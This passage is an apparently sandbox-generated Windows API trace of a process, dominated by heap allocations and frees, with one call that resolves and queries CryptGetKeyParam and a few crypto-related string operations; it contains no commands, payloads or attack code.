dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0181.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0181.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0181.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0181.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0181.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0181.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0181.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0181.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0181.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0181.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0181.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0181.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0181.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0181.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0181.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0181.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0181.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0181.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0181.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.700] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0181.701] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0181.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.703] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.703] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0181.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0181.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.704] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.704] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.704] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.704] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, 